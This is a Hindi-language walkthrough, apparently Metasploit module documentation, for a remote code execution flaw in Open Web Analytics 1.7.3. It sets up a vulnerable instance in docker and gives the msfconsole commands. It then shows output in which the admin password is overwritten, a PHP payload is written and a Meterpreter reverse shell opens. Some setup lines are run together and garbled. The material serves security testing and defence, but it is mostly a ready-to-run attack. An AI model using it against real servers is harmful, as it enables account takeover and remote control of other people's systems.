
Open Web Analytics 1.7.3 - दूरस्थ कोड निष्पादन
Open Web Analytics (OWA) 1.7.4 से पहले के संस्करण में एक अप्रमाणित रिमोट हमलावर को संवेदनशील उपयोगकर्ता जानकारी प्राप्त करने की अनुमति है, जिसका उपयोग कैश हैश का लाभ उठाकर व्यवस्थापक विशेषाधिकार प्राप्त करने के लिए किया जा सकता है। ऐसा इसलिए होता है क्योंकि '<?php (इच्छित "<?php अनुक्रम के बजाय) से उत्पन्न फाइलें PHP इंटरप्रेटर द्वारा संभाली नहीं जाती हैं।
डॉकर का उपयोग करके OWA का एक असुरक्षित इंस्टेंस प्रारंभ करें
docker compose up -ddocker-compose.yml फ़ाइल से envs का उपयोग करके स्थापना चरणों का पालन करें
http://127.0.0.1/docker inspect <db-container> और IPAddress प्राप्त करें, जैसे 172.22.0.2)3306owaowaDemo12+#http://127.0.0.1admin[email protected]Demo12+#msfconsole प्रारंभ करें
use exploit/multi/http/open_web_analytics_rce
set RHOSTS 127.0.0.1
set RPORT 80
set SSL false
set LHOST 172.22.0.1 -> यह ब्रिज IP होना चाहिए जो docker compose up -d कमांड से बनाया गया था
check
run
लक्ष्य का शोषण करते समय, हमला किए गए उपयोगकर्ता का पासवर्ड इस पासवर्ड से ओवरराइट कर दिया जाएगा।
वह उपयोगकर्ता जिसे इस शोषण से लक्षित किया जाएगा।
यह शोषण एक कैश फाइल से temp_passkey मान प्राप्त करके काम करता है जो प्रत्येक उपयोगकर्ता के लिए लॉगिन करने का प्रयास करते समय बनाई जाती है। चूंकि /owa-data/caches/ निर्देशिका सार्वजनिक रूप से सुलभ है, हम इन कैश फाइलों को प्राप्त कर सकते हैं। कैश फाइलों का सटीक पथ user_id पर निर्भर करता है और इसके साथ गणना की जा सकती है। यह विकल्प परिभाषित करता है कि 0 से शुरू होने वाले कितने गणना किए गए पथों को उनमें temp_passkey मान वाली कैश फाइलों के लिए जांचा जाना चाहिए।
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run
[*] Started reverse TCP handler on 172.22.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!
meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >